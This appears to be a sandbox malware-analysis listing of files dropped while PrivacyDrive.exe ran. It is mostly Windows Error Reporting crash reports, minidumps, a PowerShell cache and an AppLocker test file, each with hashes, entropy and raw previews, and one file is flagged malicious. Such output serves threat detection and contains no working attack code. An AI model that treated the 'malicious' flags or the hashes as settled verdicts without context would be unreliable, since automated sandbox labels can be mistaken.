                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.8.3.9.2.1.9.4.2.2.7.1.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.8.3.9.2.1.9.8.2.8.9.6.0.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.d.4.5.1.3.b.3.-.0.2.8.e.-.4.6.9.c.-.9.3.b.1.-.1.8.8.6.1.3.1.5.6.3.0.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.e.6.5.3.5.7.9.-.7.4.0.8.-.4.7.6.d.-.a.c.f.a.-.5.3.a.8.f.1.e.8.b.f.a.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.2.f.c.-.0.0.0.1.-.0.0.1.4.-.4.f.e.6.-.9.4.4.b.2.b.1.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.f.2.e.4.0.a.8.6.4.b.d.2.7.1.9.8.0.3.2.4.7.b.3.9.f.f.3.2.6.d.e.0.0.0.0.0.9.0.4.!.0.0.0.0.0.3.a.c.1.9.1.b.2.3.5.b.3.a.8.6.7.5.3.9.7.2.0.0.7.0.a.5.e.
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.1039131192671594
                              Encrypted:false
                              SSDEEP:192:vR8VGzY0K0PdzuyUjTcZr8kF9azuiFb9Z24IO8ZA:Z8YE0RPdzAjSazuiFb9Y4IO8e
                              MD5:3578AA287953D48009F2663494552057
                              SHA1:64D9FA397A0BC619026131624A5186E7D85087E5
                              SHA-256:E1F4F2505E3429C1829AA8F761698C85F119E40EEF647A061C813A3ACB6B78BB
                              SHA-512:3F5FC5977F3A31821AEFB5857746225C927ED19ACAE558774F312BA2642ACE8204D1BBFB368EA5C7F2C80F02B80CD1E6FE85F9266744EE547B1189B0D397D0CC
                              Malicious:true
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.8.3.9.2.1.1.4.9.6.6.3.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.8.3.9.2.1.2.4.4.9.7.6.9.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.4.4.a.a.9.1.-.5.6.a.f.-.4.e.f.1.-.8.f.8.2.-.7.3.6.1.1.2.9.3.9.1.f.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.e.2.8.c.f.a.-.d.5.f.5.-.4.4.2.a.-.9.3.f.a.-.1.4.8.9.c.8.7.e.6.e.2.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.c.8.-.0.0.0.1.-.0.0.1.4.-.c.1.1.6.-.0.d.4.5.2.b.1.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.f.2.e.4.0.a.8.6.4.b.d.2.7.1.9.8.0.3.2.4.7.b.3.9.f.f.3.2.6.d.e.0.0.0.0.0.9.0.4.!.0.0.0.0.0.3.a.c.1.9.1.b.2.3.5.b.3.a.8.6.7.5.3.9.7.2.0.0.7.0.a.5.e.6.c.a.1.1.
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 15 streams, Thu Sep 26 15:46:49 2024, 0x1205a4 type
                              Category:dropped
                              Size (bytes):111634
                              Entropy (8bit):2.1700591180910185
                              Encrypted:false
                              SSDEEP:384:5C//ISqqjuEj6PDZBYfNog+QI+J3tG3W6To11Jr7LlLhsX9wygNifcKf5t:YgSq4SZBqogdG3pTo11/Lhzscm5
                              MD5:13153F245A415E8103B0865916CD08DE
                              SHA1:AB0CCBBC4EFE23031CC1DF10FA997903742BBB6D
                              SHA-256:AD721C8228746ED53EA7B905B0E7FC10BD26BD0AC8AB7F8A6C556561E7A0E9BE
                              SHA-512:26D9C19A2C5F6696DD592461F74622C7272EE9584F7E63A5F13F4B9BAD9D6F338CA84AC10C0DFF2AB787996515C668130325195AC971A0A82CB3CABA67835EE6
                              Malicious:false
                              Preview:MDMP..a..... .........f....................................<....$..........8N..........`.......8...........T............D...p...........%...........&..............................................................................eJ.......'......GenuineIntel............T.............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6410
                              Entropy (8bit):3.7164670635306973
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJt6Y6CUYDJtO3puU89b4HsfbEAom:R6lXJ36JYDJtOQ4Mfbb
                              MD5:6DCD769FFF6BDCACE450B935B24A8395
                              SHA1:BB60C3FD6BA5CC9325FB308353FCCAC9C7BEB8AE
                              SHA-256:170132296494DF8E47D9AE8806BD912AB32CAEA6CB7B64A4902F55C90F1CCE46
                              SHA-512:0638E98EE397285017D7417915959E0B6BA86314D91C38A3741BF68030D9D90153E732796F5A32182F2EF866115E1A3004A8788F5AF48BE9EFD238F5BB0CABC3
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.0.4.<./.P.i.
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4776
                              Entropy (8bit):4.440214655369833
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zsquJg77aI9riBWpW8VYjCYm8M4JwuTfmFp+q8vCf+m1HAcHSUd:uIjflI7UQ7VaJwuTiKCWm1HAcHSUd
                              MD5:7D31A6A7B00F174B2A2E8618BCADFA53
                              SHA1:E0C3C2ECD492868F94E0653EB62F8192581B4CB5
                              SHA-256:2D7DCD1AF7C292218AF607FA5C9855E86236D226CF221F822E728C02C5D99FDE
                              SHA-512:085E96AC2963614B6AD14A6CF0D77A4B9ABBCD676C6A809EE4C27F18A47F3A90BC37793EB7FE120356CBB22AF36EF8FAAB20FA38BCCA78BDDA8DE5BD532EAFD0
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="517369" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 15 streams, Thu Sep 26 15:46:50 2024, 0x1205a4 type
                              Category:dropped
                              Size (bytes):110752
                              Entropy (8bit):2.175877710728553
                              Encrypted:false
                              SSDEEP:384:+/EnISqqjuEj6qmZB8Ehq+3YjJ3HG/W6To11tbOgR8wGm4iGm15CP7:+PSq4XmZB8Ehq9G/pTo11QgR8wv9IP7
                              MD5:8EB14848B11B41CF3C4E43ADA06E2C35
                              SHA1:60009E72FDFBF7C7225DAD8D06CB5F4DD49BCB47
                              SHA-256:5A83821F19B3923C0B309139A57B69400798F58AD1C3C478CD9660512946E487
                              SHA-512:4BCF3688E4C55C49EDA54279CADE65FA8BD2451F87DCB77B527345DC580BFA130C83DAE1CB378E65623EDAF86B1B4BFD1DAFDA783F3EB187D0B9B89FA14C117E
                              Malicious:false
                              Preview:MDMP..a..... .........f....................................<....$..........8N..........`.......8...........T............C...m...........%...........&..............................................................................eJ.......'......GenuineIntel............T.............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6410
                              Entropy (8bit):3.714674680411623
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJt6M6E6+YDJtOK2puT89bYHsfN6Im:R6lXJj6gYDJtOK0YMfS
                              MD5:5849474776DB562D7E697CE3D4DEE8CF
                              SHA1:1B0F49B4FC5ECE201613D628932C34CD1BC9F8DD
                              SHA-256:1B74A1C5AB8ECC89544A89680FEA789067159D1673C4F9660937F5A2ACF2FD0B
                              SHA-512:B3671C7C2C401E438150C9DE44A4A5527858DE4B092BF668F64981C5D726BCA3B62EE1F3E95B09DD775158CA649D5406706B6A60B5DA30AB5E52EC654B5DDDB5
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.0.4.<./.P.i.
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4776
                              Entropy (8bit):4.441051246534752
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zsquJg77aI9riBWpW8VYjgYm8M4JwuTfmFr+q8vCf+m1HAcHSUd:uIjflI7UQ7VQJwuTgKCWm1HAcHSUd
                              MD5:775B392C1839EB6D318787EA71DF0485
                              SHA1:C960300A131D8C7A3A44C4AE6DB85D4E4E1C1A48
                              SHA-256:2051DAA44D7B9DBAA6FE7DEF304194CC03DB291F3F4FCFE87B68EC5C6E762DB9
                              SHA-512:A9CE6529D27DD2665681FA27E27E717C942CF7E9A37BF4991AB4082A7F18E4923D8FC4B6C659B317D2E501E392DF5951EBD5465FDF3BD579C338A031E4B84EF5
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="517369" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 15 streams, Thu Sep 26 15:46:51 2024, 0x1205a4 type
                              Category:dropped
                              Size (bytes):106808
                              Entropy (8bit):2.172258616149112
                              Encrypted:false
                              SSDEEP:384:EOtISqqjuEj6KZBCmmq+3YDJ3HG8zzfo0WxNlAtuWqjnG/SvuaGXDd1J8hT5++c:BmSq4bZBC5qdG8vfo0ElAtu9wdy5++c
                              MD5:5043FB3A074211CE653AE3394F1580E4
                              SHA1:FA5D524E79B4A5C8652DE12FF40DA67807D806AD
                              SHA-256:FE7F41DE80D67A7F613E74287F6F357CC8B395B9A04C7EBDA61B1CAC5074BE9A
                              SHA-512:D5D68EF9894F70806C429F700163D6E2FA28BFCF001DAA46D9C999D9A1179720005738DA686C2697B7224B641BBBA455C0D7F2ECD442855D01D0D065140DFB59
                              Malicious:false
                              Preview:MDMP..a..... .........f....................................<....$..........8N..........`.......8...........T...........PB...^...........%...........&..............................................................................eJ.......'......GenuineIntel............T.............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6396
                              Entropy (8bit):3.713577827754243
                              Encrypted:false
                              SSDEEP:96:RSIU6o7wVetbt6D62VYDJahE+5aMQUP89bhHsf9HvLm:R6l7wVeJt6D62VYDJaZpDP89bhHsfNLm
                              MD5:272A4D91B961BD542B2E8863A03943E7
                              SHA1:C9DF3F4285BA14C4E5148FDD3E3A13CBA34F7146
                              SHA-256:07B7BFA501C5F22DF133FD8CF5D37E02EC5FE9DE52143E226FA4AC22859BBCE0
                              SHA-512:33F8650673677A1CB426C0CE5C873453A6B07F9D1C52EC027DB79739A53C90A49AE3C3F991BD55D926F1BD9466D7199CA2270BE31A98624B7642908FBB4BF1D4
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.0.4.<./.P.i.
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4776
                              Entropy (8bit):4.446580563616763
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zsquJg77aI9riBWpW8VYj0Ym8M4JwuTfleFs+q8vCflmm1HAcHSUd:uIjflI7UQ7VEJwuT9DKC9mm1HAcHSUd
                              MD5:BA200BAC34410A0BD6F391E271389F46
                              SHA1:58FB21389F2D2929C79D539A60DA79ED1208EE0F
                              SHA-256:17FAE734B858586DA7CA4D2E736BF051FF581452B597AED44F76016DA699966B
                              SHA-512:08A987C879640AEE6CB663085596EDECBEEEA359DEA826D4F2E99D5396834D3FBB47C7153AE4B61F84233316CF95D0A9EBDFF5831DF8F3BFE6B67453891779D9
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="517369" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 15 streams, Thu Sep 26 15:46:59 2024, 0x1205a4 type
                              Category:dropped
                              Size (bytes):112256
                              Entropy (8bit):2.1771936571854846
                              Encrypted:false
                              SSDEEP:768:HeZ8JB0FlG/IzuoPX7a68MpNagLgaghwgK/x9jdByG:Hszl4IlrhNagVJ9Z9jdByG
                              MD5:78C030A269210DB202D14FC9B6DA4C69
                              SHA1:567479CC46C99A8BA14D7F4D949ABAF429DD06C7
                              SHA-256:EF83528B8C437DC766A30116A7E2396EAF4FD35C6D02347FD9389B4E30953954
                              SHA-512:DB49043CA1AA85990129847CD95AFD717377A602A6F9ABB6173D516AD9F8EF471A3B929FCD8C9A6FE56F29522A504751E3F00027ABE495041F6ABA9DA96AB4A0
                              Malicious:false
                              Preview:MDMP..a..... .........f....................................T....$...........N..........`.......8...........T...........0D..Pr..........(%...........'..............................................................................eJ.......'......GenuineIntel............T.............f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8398
                              Entropy (8bit):3.7031460673612497
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJul6FT6Y94SU9XEmgmfW6prw89bp4sfxjm:R6lXJk6h6YCSU9XEmgmfWKprf4
                              MD5:FD50E145C9E9DBB730F344B6DC8A9F70
                              SHA1:3B09A011F267081CCC902F00D1F65F70C7085981
                              SHA-256:DDB611468746A96AD7809263A5600E649B99ABC12474269AE4BDA6479F7E934A
                              SHA-512:1C88D84E19B947F73D7B0E1B50432A2561A88D43AE667FA0A79E0C9F7B8E55FAF74BF2269B63EC6FE620FEA24CE659813D87B5CFE9D185C89FF78E9C67289E03
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.4.<./.P.i.d.
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4709
                              Entropy (8bit):4.498618808951964
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zsquJg77aI9riBWpW8VYjoPYm8M4JwuTfqF66+q82PRm1HAcHLUd:uIjflI7UQ7V9SJwuTwzpm1HAcHLUd
                              MD5:9AC958A42939BE28A13F87CE1F66B363
                              SHA1:940EF9424D6031BECE3B856532F6751D18B5A064
                              SHA-256:D1232145DFF5617145E07F32DF30E0FFC339ADB3FE79697FF0AEAD35BAADEFCF
                              SHA-512:899031A9F0A49B05D842F0527D48E3507D433E4105F6E68DFEC0F90F63042E2FC9A1CD4A4EA9CF709E11A15C7013E2B5680D875851C5BE3F5AC191F2178A4E73
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="517369" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2468
                              Entropy (8bit):5.5617838632791745
                              Encrypted:false
                              SSDEEP:48:OWSU4xympgv4RIoUP7mZ9tK8NWR85YdWNNLbR11XWKmEqrI6lxzQh/:OLHxv2IfBZ2KWmYdWTRbrvqrI6v0/
                              MD5:514D7854938D395C95BAE82D6F73CC01
                              SHA1:AF58640B7829CC8C252E0325919FDB12DC3CE8B9
                              SHA-256:7795366E8B3025A4EE3C786406F79CF7E8039DAFB47BCFC920BC84A861A7071B
                              SHA-512:2454BDD14DE328F201F467F16BED9A177136F3C27331C06FB0719F83A547D136C7528FF28634A7391A5D35D04EBBA445F9C62EAFB8351EC90EFB3A777C0F64E5
                              Malicious:false
                              Preview:@...e.................................,..............@..........P................1]...E.....#.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
